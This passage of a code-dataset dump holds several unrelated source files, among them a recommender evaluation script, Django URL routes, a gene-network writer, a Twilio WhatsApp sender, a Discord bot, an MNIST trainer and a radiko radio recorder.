action='store_true', help='global preference')\r\nparser.add_argument('--kg', type=int, default=1000)\r\nparser.add_argument('--num_head', type=int, default=1)\r\nparser.add_argument('--num_block', type=int, default=1)\r\nparser.add_argument('--num_gcn', type=int, default=1)\r\nopt = parser.parse_args()\r\n\r\ntest_data = pickle.load(open('../datasets/' + opt.dataset + '/test.txt', 'rb'))\r\ntest_data = Data(test_data, sub_graph=True, method=opt.method, shuffle=False)\r\n\r\nif opt.dataset == 'diginetica':\r\n n_node = 43098\r\nelif opt.dataset == 'yoochoose1_64' or opt.dataset == 'yoochoose1_4':\r\n n_node = 37484\r\nelif opt.dataset == 'yoochoose':\r\n n_node = 17377\r\nelif opt.dataset == 'y14':\r\n n_node = 30445\r\nelif opt.dataset == 'lastfm2':\r\n n_node = 40001\r\nelif opt.dataset == 'lastfm':\r\n n_node = 39164\r\nelif opt.dataset == 'retailrocket' or 'rr' in opt.dataset:\r\n n_node = 36969\r\n\r\nmodel = MIR4SR(hidden_size=opt.hidden_size,\r\n emb_size=opt.emb_size,\r\n n_node=n_node,\r\n method=opt.method,\r\n kg=opt.kg,\r\n num_head=opt.num_head,\r\n num_block=opt.num_block,\r\n nonhybrid=opt.nonhybrid,\r\n num_gcn=opt.num_gcn)\r\n\r\nsaver = tf.train.Saver()\r\nsaver.restore(model.sess, opt.model_path)\r\nslices = test_data.generate_batch(opt.batch_size)\r\nprint('start predict:' + time.strftime('%m-%d %H:%M:%S ', time.localtime(time.time())))\r\nhit = {5: [], 10: [], 15: [], 20: [], 30: [], 40: [], 50: [], 60: []}\r\nmrr = {5: [], 10: [], 15: [], 20: [], 30: [], 40: [], 50: [], 60: []}\r\nndcg = {5: [], 10: [], 15: [], 20: [], 30: [], 40: [], 50: [], 60: []}\r\n# fetches = [model.logits, model.rec_loss, model.top_k, model.s_emb, model.sa_att, model.att]\r\nfetches = [model.logits, model.rec_loss, model.top_k]\r\ntest_loss_, ans, sess_emb, atts, sa_atts = [], [], [], [], []\r\nfor i, j in zip(slices, np.arange(len(slices))):\r\n batch_input = test_data.get_slice(i)\r\n # scores, test_loss, tk, s_emb, sa_att, att = model.run_rec(\r\n # fetches, batch_input, is_train=False)\r\n scores, test_loss, tk = model.run_rec(\r\n fetches, batch_input, is_train=False)\r\n test_loss_.append(test_loss)\r\n ans.append(tk)\r\n # sess_emb.append(s_emb)\r\n # sa_atts.append(sa_att)\r\n # atts.append(att)\r\n\r\n targets = batch_input[-1]\r\n for score, target in zip(tk, targets):\r\n for i in [5, 10, 15, 20, 30, 40, 50, 60]:\r\n hit[i].append(np.isin(target - 1, score[:i]))\r\n if len(np.where(score[:i] == target - 1)[0]) == 0:\r\n mrr[i].append(0)\r\n ndcg[i].append(0)\r\n else:\r\n rank = 1 + np.where(score[:i] == target - 1)[0][0]\r\n mrr[i].append(1 / rank)\r\n ndcg[i].append(1 / math.log(rank + 1, 2))\r\n\r\nprint('test sample %d' % len(hit[20]))\r\nfor i in [5, 10, 15, 20, 30, 40, 50, 60]:\r\n hit[i] = np.mean(hit[i]) * 100\r\n mrr[i] = np.mean(mrr[i]) * 100\r\n ndcg[i] = np.mean(ndcg[i]) * 100\r\n\r\ntest_loss = np.mean(test_loss_)\r\nprint('test_loss: %.4f' % (test_loss))\r\nprint('Recall@5: %.4f, MMR@5: %.4f, NDCG@5: %.4f' % (hit[5], mrr[5], ndcg[5]))\r\nprint('Recall@10: %.4f, MMR@10: %.4f, NDCG@10: %.4f' % (hit[10], mrr[10], ndcg[10]))\r\nprint('Recall@15: %.4f, MMR@15: %.4f, NDCG@15: %.4f' % (hit[15], mrr[15], ndcg[15]))\r\nprint('Recall@20: %.4f, MMR@20: %.4f, NDCG@20: %.4f' % (hit[20], mrr[20], ndcg[20]))\r\nprint('Recall@30: %.4f, MMR@30: %.4f, NDCG@30: %.4f' % (hit[30], mrr[30], ndcg[30]))\r\nprint('Recall@40: %.4f, MMR@40: %.4f, NDCG@40: %.4f' % (hit[40], mrr[40], ndcg[40]))\r\nprint('Recall@50: %.4f, MMR@50: %.4f, NDCG@50: %.4f' % (hit[50], mrr[50], 
ndcg[50]))\r\nprint('Recall@60: %.4f, MMR@60: %.4f, NDCG@60: %.4f' % (hit[60], mrr[60], ndcg[60]))\r\n","sub_path":"MTD/load_test.py","file_name":"load_test.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"455615940","text":"from django.conf.urls import include, url\nfrom django.conf import settings\nfrom travelondesk import views\n\nurlpatterns = [url(r'^$', views.index, name='index'),\n               url(r'^demandTickets/$', views.demandListView, name='demandTickets'),\n               url(r'^serviceTickets/$', views.serviceListView, name='serviceTickets'),\n               #url(r'^(?P<country>[0-9]+)/serviceTickets/$', views.countryServiceListView, name='countryServiceTickets'),\n               url(r'^(?P<country>[A-Z]+)/serviceTickets/$', views.countryServiceListView, name='countryServiceTickets'),\n               url(r'^(?P<country>[A-Z]+)/demandTickets/$', views.countryDemandListView, name='countryDemandTickets'),\n               url(r'^serviceTickets/(?P<category>[a-z]+)$', views.categoryServiceListView, name='categoryServiceTickets'),\n               url(r'^demandTickets/(?P<category>[a-z]+)$', views.categoryDemandListView, name='categoryDemandTickets'),\n               url(r'^(?P<country>[A-Z]+)/serviceTickets/(?P<category>[a-z]+)$', views.countryCategoryServiceListView, name='countryCategoryServiceTickets'),\n               url(r'^(?P<country>[A-Z]+)/demandTickets/(?P<category>[a-z]+)$', views.countryCategoryDemandListView, name='countryCategoryDemandTickets'),\n               url(r'^demand/(?P<pk>[0-9]+)/$', views.DemandDetailView.as_view(), name='demandDetail'),\n               url(r'^service/(?P<pk>[0-9]+)/$', views.ServiceDetailView.as_view(), name='serviceDetail'),\n               url(r'^newService/$', views.serviceTicketNew, name='serviceTicketNew'),\n               url(r'^newDemand/$', views.demandTicketNew, name='demandTicketNew'),\n               url(r'^service/(?P<pk>[0-9]+)/edit/$', views.serviceEdit, name='serviceEdit'),\n               url(r'^demand/(?P<pk>[0-9]+)/edit/$', views.demandEdit, name='demandEdit'),\n               url(r'^accounts/(?P<username>[\w.@+-]+)/$', views.accountView, name='account'),\n               url(r'^accounts/(?P<username>[\w.@+-]+)/edit/$', views.userEdit, name='userEdit'),\n               url(r'^serviceTickets/(?P<username>[\w.@+-]+)/$', views.userServiceListView, name='userServiceTickets'),\n               url(r'^demandTickets/(?P<username>[\w.@+-]+)/$', views.userDemandListView, name='userDemandTickets'),\n               url(r'^contact/$', views.contactView, name='contact'),\n               url(r'^thanks/$', views.thanksView, name='thanks'),\n               url(r'^about/$', views.aboutView, name='about'),\n               url(r'^term/$', views.termOfServiceView, name='term'),\n               url(r'^deleteDemand/(?P<pk>[0-9]+)/$', views.deleteDemandTicket, name='deleteDemand'),\n               url(r'^deleteService/(?P<pk>[0-9]+)/$', views.deleteServiceTicket, name='deleteService'),\n               #url(r'^i18n/', include('django.conf.urls.i18n')),\n]","sub_path":"travel/travelondesk/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"532926003","text":"# coding: utf-8\nimport argparse\nimport csv\nimport gzip\nimport os\nimport itertools\n\nimport numpy as np\n\n\ndef grouper(iterable, n, fillvalue=None):\n    \"\"\"Collect data into fixed-length chunks or blocks\"\"\"\n    # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx\n    args = [iter(iterable)] * n\n    return itertools.izip_longest(fillvalue=fillvalue, *args)\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('input', nargs=\"+\")\n    parser.add_argument('--labels', nargs=\"+\")\n    parser.add_argument('--output') ## directory of output\n\n    parser.add_argument('--power', type=float, default=1.0)\n    parser.add_argument('--cutoff', type=float, 
default=0.0)\n\n parser.add_argument('--format', choices=('multiplex', 'monolayer', 'summed'))\n parser.add_argument('--cutoff_type', choices=('independent', 'group'))\n\n args = parser.parse_args()\n\n project = os.path.basename(args.labels[0][:-4]).split('_')[0]\n\n labels = dict()\n for label_file in args.labels:\n d1 = os.path.basename(label_file[:-4]).split('_')[1] ## get the data-type\n with open(label_file) as f:\n rdr = csv.reader(f, delimiter='\\t')\n rdr.next()\n labels[d1] = {r[0]:i for i,r in enumerate(rdr)}\n\n label_u = sorted(reduce(set.union, labels.values(), set())) ## find the union of all genes\n\n mmaps = dict()\n for input_file in args.input: ## expects multiple files \n d1,d2 = os.path.basename(input_file).split('_')[0].split('-') ## gets d1-d2_ info ## but this should be the set of labels in each matrix\n\n mmaps[(d1,d2)] = np.memmap(input_file, dtype=np.float64, ## reads e_value matrix in to memmap format\n mode='r', shape=(len(labels[d1]), len(labels[d2])))\n ## Resicnded: Should work because data is loaded w/ correct dimensions\n\n\n ## creates map between data-type pair and enrichment matrix (e_values), reads enrichment matrix as memmap\n\n dtypes = list(enumerate(sorted(reduce(set.union, mmaps, set())))) ## find set of data-types\n\n \n ## gene to index mapping file generate, using labels_u\n output_label_path = os.path.join(args.output,project+'_'+args.format+'_'+str(args.cutoff)+'_labels.txt')\n with open(output_label_path,'w') as OUT:\n print >> OUT, '\\n'.join('{}'.format(g) for g in label_u)\n\n ## set the new output file as the info + the project id name\n output_file_path = os.path.join(args.output,project+'_'+args.format+'_'+str(args.cutoff)+'.txt.gz')\n with gzip.open(output_file_path, 'w') as OUT:\n if args.format == 'multiplex':\n print >> OUT, '*Vertices {:d}'.format(len(label_u))\n print >> OUT, '\\n'.join('{:d} \"{}\"'.format(i,g) for i,g in enumerate(label_u))\n print >> OUT, '*Multiplex'\n\n for g1g2 in grouper(itertools.combinations(enumerate(label_u), 2), 10000): ## consider all data-combinations, chunked in 10K\n lines = []\n for (i1,g1),(i2,g2) in itertools.ifilter(None, g1g2): \n pair_edges = []\n for (j1,d1),(j2,d2) in itertools.product(dtypes, dtypes): ## get data-type combinations\n if g1 in labels[d1] and g2 in labels[d2]:\n if j1 <= j2:\n e = mmaps[(d1,d2)][labels[d1][g1], labels[d2][g2]]\n else:\n e = mmaps[(d2,d1)][labels[d2][g2], labels[d1][g1]]\n\n if ((args.cutoff_type == 'independent' and e > args.cutoff)\n or (args.cutoff_type == 'group' and e > 0.0)):\n\n pair_edges.append((j1, j2, e))\n\n if pair_edges and (args.cutoff_type != 'group'\n or sum(e for j1,j2,e in pair_edges) > args.cutoff):\n if args.format == 'multiplex':\n lines.extend('{:d}\\t{:d}\\t{:d}\\t{:d}\\t{:f}'.format(j1, i1, j2, i2, e ** args.power)\n for j1,j2,e in pair_edges)\n elif args.format == 'monolayer':\n lines.extend('{:d}\\t{:d}\\t{:f}'.format(i1, i2, e ** args.power)\n for j1,j2,e in pair_edges)\n elif args.format == 'summed':\n lines.append('{:d}\\t{:d}\\t{:f}'.format(i1, i2, sum(e for j1,j2,e in pair_edges) ** args.power))\n\n if lines:\n print >> OUT, '\\n'.join(lines)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"M05_write_multiplex_network.py","file_name":"M05_write_multiplex_network.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"135067190","text":"\nimport matplotlib.pyplot as plt\nimport math\nimport re\nimport sys\n\n\n\nclass Node:\n def 
__init__(self,val):\n        self.val = val #containing a tuple with id, chr, position\n        self.ref = None # the pointer initially points to nothing\n\n    def getChr(self):\n        return int(re.split('p|q', self.val[1])[0])\n\n    def getArm(self):\n        if 'p' in self.val[1]:\n            return 'p'\n\n        else:\n            return 'q'\n\n    def getPos(self):\n        s = re.split('\\(|\\,|\\)', self.val[2])\n        return (s[1], s[2])\n\n    def getNext(self):\n        return self.ref\n\n    def setNext(self,newnext):\n        self.ref = newnext\n\n    def setData(self,newdata):\n        self.val = newdata\n\n\n\nclass LinkedList: \n    def __init__(self): \n        self.start_node = None #Initially Start Node is Null \n\n    def traverse_list(self, value=False): \n        new_list =[] \n        if self.start_node is None: \n            print(\"List is empty\") \n            return None\n        else: \n            n = self.start_node \n            while n is not None: \n                if value == False: \n                    new_list.append(n) #append the whole node \n                    n = n.ref #next node will be the one pointing to \n                else: \n                    new_list.append(n.val) #append only the value \n                    n = n.ref \n            return new_list \n    \n    def insert_at_start(self, data): \n        new_node = Node(data) \n        new_node.ref = self.start_node \n        self.start_node= new_node \n    \n    def append(self, data): \n        current = self.start_node \n        while current.getNext() != None: \n            current = current.getNext() \n\n        current.ref= Node(data)\n\n        return current\n    \n    \n    def get_first_item(self): \n        return self.start_node \n    \n    def insertion_sort(self): \n        h =self.start_node \n        if h == None: \n            return None \n        #Make the first node the start of the sorted list. \n        sortedList= h \n        h=h.ref \n        sortedList.ref= None \n        while h != None: \n            curr= h \n            h=h.ref \n            if curr.getChr() < sortedList.getChr(): \n                #current goes before the head of the sorted list. \n                curr.ref= sortedList \n                sortedList= curr \n            else: \n                #Locate the node to insert current after. \n                search= sortedList \n                while search.ref != None and curr.getChr() > search.ref.getChr(): \n                    search= search.ref \n                #current goes after search. \n                curr.ref= search.ref \n                search.ref= curr \n        \n        sorted_list = LinkedList() \n        while sortedList: \n            if sorted_list.get_first_item() == None: \n                sorted_list.insert_at_start(sortedList.val) \n            else: \n                sorted_list.append(sortedList.val) \n        \n            sortedList = sortedList.ref \n        \n        return sorted_list \n    \n    def contains(self,val): \n        if self.start_node == None: \n            return Node(None) \n        else: \n            p = self.start_node \n            while p is not None: \n                if val == p.val[0]: \n                    return p \n                p = p.ref \n        return Node(None) #Returns an empty node if no element is found \n    \n    def calc_dist(self, cut_off): \n        output_list = LinkedList() \n        \n        for i in range(len(self.traverse_list())): \n            for j in range(i + 1, len(self.traverse_list())): #traverse through all the possibilities\n                node1, node2 = self.traverse_list()[i], self.traverse_list()[j]\n                chrom1, chrom2 = node1.getChr(), node2.getChr()\n                arm1, arm2 = node1.getArm(), node2.getArm()\n                \n                existing_node = output_list.contains((chrom1, arm1))\n                \n                if output_list.get_first_item() == None: #First element in the list \n                    output_list.insert_at_start(((chrom1, arm1), 0)) \n                \n                elif existing_node.val == None: #if new chr and arm\n                    output_list.append(((chrom1, arm1), 0))\n                \n                existing_node = output_list.contains((chrom1, arm1))\n                \n                if chrom1 == chrom2 and arm1 == arm2: #if nodes have same chr and arm, calculate distance \n                    xy_node1 = node1.getPos() \n                    xy_node2 =node2.getPos() \n                    dist = math.sqrt((float(xy_node1[0])-float(xy_node2[0]))**2+(float(xy_node1[1])-float(xy_node2[1]))**2) \n                    if dist <= cut_off: \n                        existing_node.setData(((chrom1, arm1), existing_node.val[1] +1))\n                \n        \n        return output_list\n\n\ninput_file=sys.argv[1]\nk = sys.argv[2]\n\n\nf= open(input_file,\"r\") \nmy_list = LinkedList() \nfor line in f.readlines(): \n    \n    line= line.strip('\n').split('\t') \n    if my_list.get_first_item() 
== None: \n my_list.insert_at_start((line[0],line[1],line[2])) \n \n else: \n my_list.append((line[0],line[1],line[2])) \n \n\nsorted_list = my_list.insertion_sort()\noutput = sorted_list.calc_dist(1)\n\noutput_file ='output.txt'\n\nout_f = open(output_file, \"w\")\n\nfor line in output.traverse_list(value=True):\n out_f.write(str(line[0][0])+line[0][1]+ '\\t'+ str(line[1])+'\\n')\nout_f.close()\n\n","sub_path":"APA_newnew.py","file_name":"APA_newnew.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114668067","text":"import os\ndef sendwhatsappmessage(message):\n '''\n message: message to be sent\n '''\n auth_token=os.environ['auth_token']\n account_sid=os.environ['account_sid']\n my_phone_no=os.environ['my_phone_no']\n from twilio.rest import Client\n client=Client(account_sid,auth_token)\n to=f\"whatsapp:+91{my_phone_no}\"\n from_=\"whatsapp:+14155238886\"\n body=message\n message=client.messages.create(from_=from_,body=body,to=to)\n print(message.status)\nif __name__==\"__main__\":\n sendwhatsappmessage(\"test message\")","sub_path":"whatsapp.py","file_name":"whatsapp.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"359754100","text":"from qc_grader.grade import grade_json, submit_json\n\n\ndef format_submission(\n f12: float,\n qubit_index: int,\n backend_name: str\n) -> dict:\n return {\n 'f12': f12,\n 'qubit_index': qubit_index,\n 'backend_name': backend_name\n }\n\n\ndef grade_ex4(\n f12: float,\n qubit_index: int,\n backend_name: str\n) -> None:\n try:\n submission = format_submission(f12, qubit_index, backend_name)\n ok, _ = grade_json(submission, 'ex4')\n if ok:\n print('Feel free to submit your answer.\\r\\n')\n except Exception as err:\n print(err)\n\n\ndef submit_ex4(\n f12: float,\n qubit_index: int,\n backend_name: str\n) -> None:\n try:\n submission = format_submission(f12, qubit_index, backend_name)\n submit_json(submission, 'ex4')\n except Exception as err:\n print(err)\n","sub_path":"qc_grader/exercises/iqc_2021/exercise4.py","file_name":"exercise4.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"216220467","text":"import discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import Bot\r\nimport asyncio\r\nimport random\r\nimport requests\r\nimport os\r\n\r\nimport discord\r\nfrom discord import Game\r\nimport asyncio as asyncio\r\nimport asyncio as asyncio\r\nimport discord\r\nfrom discord import Game\r\nfrom commands import cmdHelp, cmdInvite, cmdText, cmdClear, cmdTeam, cmdMovehost, cmdMoveall, cmdMoveteams\r\nfrom commands import STATIC\r\nfrom discord import Embed\r\n\r\nimport perms\r\n\r\nimport time\r\n\r\n\r\nclient = discord.Client()\r\n\r\ncommands = {\r\n \"help\" : cmdHelp,\r\n \"invite\" : cmdInvite,\r\n \"text\" : cmdText,\r\n \"clear\" : cmdClear,\r\n \"team\" : cmdTeam,\r\n \"movehost\" : cmdMovehost,\r\n \"moveall\" : cmdMoveall,\r\n \"moveteams\" : cmdMoveteams,\r\n}\r\n\r\n@client.event\r\n@asyncio.coroutine\r\ndef on_ready():\r\n\r\n print(\"Bot ist online auf:\\n\")\r\n for s in client.servers:\r\n print(\"- %s (%s) \" % (s.name, s.id))\r\n yield from client.change_presence(game=Game(name=\"/help für alle Befehle\"))\r\n\r\n@client.event\r\n@asyncio.coroutine\r\ndef on_message(message):\r\n if 
message.content.startswith(STATIC.PREFIX):\r\n        invoke = message.content[1:].split(\" \")[0]\r\n        args = message.content.split(\" \")[1:]\r\n        arg1 = message.content.split(\" \")[1:-len(args) + 1]\r\n        arg2 = message.content.split(\" \")[2:]\r\n        if commands.__contains__(invoke):\r\n\r\n            cmd = commands[invoke]\r\n            try:\r\n                if not perms.check(message.author, cmd.perm):\r\n                    yield from client.send_message(message.channel, embed=Embed(color=discord.Color.red(), description=(\"Du hast keine Rechte diesen Command auszuführen, /help für eine Liste!\")))\r\n                    return\r\n                yield from cmd.ex(args, message, client, invoke, arg1, arg2)\r\n            except:\r\n                cmd.ex(args, message, client, invoke, arg1, arg2)\r\n                pass\r\n\r\n        else:\r\n            from discord import Color\r\n            yield from client.send_message(message.channel, embed=Embed(color=discord.Color.red(), description=(\"Der Command /%s existiert nicht, /help für eine Liste!\" % invoke)))\r\n    \r\n@client.event\r\n@asyncio.coroutine\r\ndef on_voice_state_update(before, after):\r\n    Zeit =time.strftime(\"%d.%m.%Y %H:%M:%S\")\r\n    if before.voice.voice_channel == None:\r\n        yield from client.send_message(client.get_channel(\"553625993441443843\"), (\" :white_check_mark: %s hat den \\n**%s** Voice-Channel betreten\\n%s\" % (after.mention, after.voice.voice_channel, Zeit)))\r\n    else:\r\n        if after.voice.voice_channel == None:\r\n            yield from client.send_message(client.get_channel(\"553625993441443843\"), (\" :small_red_triangle_down: %s hat den \\n**%s** Voice-Channel verlassen\\n%s\" % (before.mention, before.voice.voice_channel, Zeit)))\r\n        else:\r\n            if before.voice.voice_channel != after.voice.voice_channel:\r\n                yield from client.send_message(client.get_channel(\"553625993441443843\"), (\":twisted_rightwards_arrows: %s hat vom \\n**%s** Voice-Channel zum \\n**%s** Voice-Channel gewechselt\\n%s\" % (after.mention, before.voice.voice_channel, after.voice.voice_channel, Zeit)))\r\n\r\nclient.run(str(os.environ.get('BOT_TOKEN')))\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"307725754","text":"\n#================================================================================================\n# In this data recognition script, I will be showing how to build a model that takes an image   #\n# file containing a handwritten digit and identifies the digit using a supervised              #\n# learning algorithm and the MNIST dataset. 
#\n# All dataset used in this script are handwritten by myself using paint on windows #\n# ============================================================================================== #\n# Tutorial followed to complete and understand what to do from: #\n# http://dataaspirant.com/2017/05/03/handwritten-digits-recognition-tensorflow-python/, #\n# https://github.com/ianmcloughlin/jupyter-teaching-notebooks/blob/master/mnist.ipynb, #\n# https://www.tensorflow.org/tutorials/ #\n# https://www.tensorflow.org/tutorials/keras/basic_classification #\n# https://github.com/docketrun/Recognise-Handwritten-Digits-using-MNIST-Data # \n# #\n# #\n# #\n#=============================================================================================== #\n\n#import modules\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n#import data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\n# Create the model\nx = tf.placeholder(tf.float32, [None, 784])\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 10])\ncross_entropy = -tf.reduce_sum(y_*tf.log(y))\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)\n\ninit_op = tf.initialize_all_variables()\nsaver = tf.train.Saver()\n\n\n# Train the model and save the model to disk as a model.ckpt file\n# file is stored in the same directory as this python script is started\n\"\"\"\nThe use of 'with tf.Session() as sess:' is taken from the Tensor flow documentation\non on saving and restoring variables.\nhttps://www.tensorflow.org/versions/master/how_tos/variables/index.html\n\"\"\"\nwith tf.Session() as sess:\n sess.run(init_op)\n for i in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n \n save_path = saver.save(sess, \"./model1.ckpt\")\n print (\"Model saved in file: \", save_path)\n\n","sub_path":"Handwritten_File/create_model_1.py","file_name":"create_model_1.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"605576639","text":"# coding: utf-8\nimport os\nimport datetime\nimport subprocess\nimport sys\nimport time\nimport base64\nimport asyncio\nfrom xml.etree import ElementTree as ET\n\nimport requests\nimport click\nfrom prettytable import PrettyTable\nimport threading\n\nfrom datetime import timedelta\n\n\n# http://stackoverflow.com/questions/4995733/how-to-create-a-spinning-command-line-cursor-using-pythonのパクリ\nclass Spinner:\n busy = False\n delay = 0.5\n\n @staticmethod\n def spinning_cursor():\n while 1:\n for cursor in '|/-\\\\':\n yield cursor\n\n def __init__(self, delay=None):\n self.spinner_generator = self.spinning_cursor()\n if delay and float(delay):\n self.delay = delay\n\n def spinner_task(self):\n while self.busy:\n sys.stdout.write(next(self.spinner_generator))\n sys.stdout.flush()\n time.sleep(self.delay)\n sys.stdout.write('\\b')\n sys.stdout.flush()\n\n def start(self):\n self.busy = True\n threading.Thread(target=self.spinner_task).start()\n\n def stop(self):\n self.busy = False\n time.sleep(self.delay)\n\n\nclass Response(object):\n def __init__(self, *args, **kwargs):\n for k, v in kwargs.items():\n self.__setattr__(k, v)\n\n\nclass Radipy(object):\n player_url = 'http://radiko.jp/apps/js/flash/myplayer-release.swf'\n fms1_url = 
'https://radiko.jp/v2/api/auth1_fms'\n fms2_url = 'https://radiko.jp/v2/api/auth2_fms'\n LANG = 'ja_JP.utf8'\n date = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d-%H')\n tmp_path='./tmp'\n playerfile='%s/player.%s.swf' % (tmp_path, date)\n keyfile = '%s/authkey.%s.jpg' % (tmp_path, date)\n playlistfile = '%s/playlist.%s.m3u8' % (tmp_path, date)\n auth_response = Response()\n auth_success_response = Response()\n output_path = './output'\n\n def __init__(self, station_id, ft):\n self.station_id = station_id\n self.ft = ft\n partialkey = ''\n self.stream_url = ''\n self.area_id = ''\n self.title = ''\n\n @staticmethod\n def clear():\n subprocess.call('rm -v %s/*.jpg' % tmp_path, shell=True)\n subprocess.call('rm -v %s/*.swf' % tmp_path, shell=True)\n\n def authenticate(self):\n self._get_playerfile()\n self._get_keyfile()\n self._get_auth1()\n self._generate_particlekey()\n self._get_auth2()\n print('--------------------------')\n print('authentication success.')\n\n def get_channels(self):\n self.authenticate()\n self._get_area_id()\n self._get_area_channels()\n\n def create(self):\n self.authenticate()\n self._get_area_id()\n self._get_stream_url()\n spinner = Spinner()\n sys.stdout.write(\"Now Downloading...\")\n spinner.start()\n if self._create_aac():\n sys.stdout.write('finish!!')\n else:\n sys.stdout.write('failed!!')\n spinner.stop()\n\n def _get_playerfile(self):\n if not os.path.exists(self.tmp_path):\n subprocess.call('mkdir {}'.format(self.tmp_path), shell=True)\n if not os.path.exists(self.playerfile):\n print('create playerFile...')\n res = requests.get(self.player_url)\n if res.status_code == 200:\n with open(self.playerfile, 'wb') as file:\n file.write(res.content)\n if not os.path.exists(self.playerfile):\n print('PlayerFile is not created.')\n\n def _get_keyfile(self):\n if not os.path.exists(self.tmp_path):\n subprocess.call('mkdir {}'.format(self.tmp_path), shell=True)\n if not os.path.exists(self.keyfile):\n print('create KeyFile...')\n subprocess.call('swfextract -b 12 {} -o {}'.format(self.playerfile, self.keyfile), shell=True)\n if not os.path.exists(self.keyfile):\n print('Keyfile is not created.')\n\n def _get_auth1(self):\n print('access auth1_fms...')\n headers = {\n 'Host': 'radiko.jp',\n 'pragma': 'no-cache',\n 'X-Radiko-App': 'pc_ts',\n 'X-Radiko-App-Version': '4.0.0',\n 'X-Radiko-User': 'test-stream',\n 'X-Radiko-Device': 'pc'\n }\n res = requests.post(url=self.fms1_url, headers=headers)\n self.auth_response.body = res.text\n self.auth_response.headers = res.headers\n self.auth_response.authtoken = self.auth_response.headers['x-radiko-authtoken']\n self.auth_response.offset = int(self.auth_response.headers['x-radiko-keyoffset'])\n self.auth_response.length = int(self.auth_response.headers['x-radiko-keylength'])\n\n def _generate_particlekey(self):\n print('generate particleKey...')\n f = open(self.keyfile, 'rb+')\n f.seek(self.auth_response.offset)\n data = f.read(self.auth_response.length)\n self.partialkey = base64.b64encode(data)\n\n def _get_auth2(self):\n print('access auth2_fms...')\n headers ={\n 'pragma': 'no-cache',\n 'X-Radiko-App': 'pc_ts',\n 'X-Radiko-App-Version': '4.0.0',\n 'X-Radiko-User': 'test-stream',\n 'X-Radiko-Device': 'pc',\n 'X-Radiko-Authtoken': self.auth_response.authtoken,\n 'X-Radiko-Partialkey': self.partialkey,\n }\n res = requests.post(url=self.fms2_url, headers=headers)\n self.auth_success_response.body = res.text\n self.auth_success_response.headers = res.headers\n\n def _get_area_id(self):\n area = 
self.auth_success_response.body.strip().split(',')\n self.area_id = area[0]\n print('area_id: %s' % self.area_id)\n\n def _get_area_channels(self):\n area_api_url = \"http://radiko.jp/v2/api/program/today\"\n params = {'area_id': self.area_id}\n res = requests.get(url=area_api_url, params=params)\n channels_xml = res.content\n tree = ET.fromstring(channels_xml)\n channels = tree.findall('.//station')\n table = PrettyTable(['id', '名前'])\n table.align['id'] = 'l'\n table.align['名前'] = 'l'\n table.padding_width = 2\n for channel in channels:\n table.add_row([channel.attrib['id'], channel.find('name').text])\n print(table)\n\n def _get_stream_url(self):\n try:\n datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(self.ft[:8], self.area_id)\n res = requests.get(url=datetime_api_url)\n channels_xml = res.content\n tree = ET.fromstring(channels_xml)\n station = tree.find('.//station[@id=\"{}\"]'.format(self.station_id))\n prog = station.find('.//prog[@ft=\"{}\"]'.format(self.ft))\n to = prog.attrib['to']\n\n # 日を跨いでいる場合は前の日の番組表を探す\n except AttributeError:\n original_date = datetime.datetime(int(self.ft[:4]), int(self.ft[4:6]), int(self.ft[6:8]))\n target_date = original_date - timedelta(days=1)\n target_date_str = target_date.strftime(\"%Y%m%d\")\n datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(target_date_str, self.area_id)\n res = requests.get(url=datetime_api_url)\n channels_xml = res.content\n tree = ET.fromstring(channels_xml)\n station = tree.find('.//station[@id=\"{}\"]'.format(self.station_id))\n prog = station.find('.//prog[@ft=\"{}\"]'.format(self.ft))\n to = prog.attrib['to']\n\n self.title = prog.find('.//title').text.replace(' ', '_').replace(' ', '_')\n table = PrettyTable(['title'])\n table.add_row([self.title])\n table.padding_width = 2\n print(table)\n self.stream_url = 'https://radiko.jp/v2/api/ts/playlist.m3u8?l=15&station_id={}&ft={}&to={}'.format(\n self.station_id,\n self.ft,\n to\n )\n\n def _create_aac(self):\n try:\n if not os.path.exists('%s%s' % (self.output_path, self.title)):\n subprocess.call('mkdir -p {}/{}'.format(\n self.output_path, self.title), shell=True)\n cmd = ('ffmpeg '\n '-loglevel fatal '\n '-n -headers \"X-Radiko-AuthToken: {}\" '\n '-i \"{}\" '\n '-vn -acodec copy \"{}/{}/{}.aac\"'.format(\n self.auth_response.authtoken,\n self.stream_url,\n self.output_path,\n self.title,\n '{}_{}'.format(self.title, self.ft[:8])\n ))\n subprocess.call(cmd, shell=True)\n print('{}/{}/{}.aac'.format(self.output_path, self.title, '{}_{}'.format(self.title, 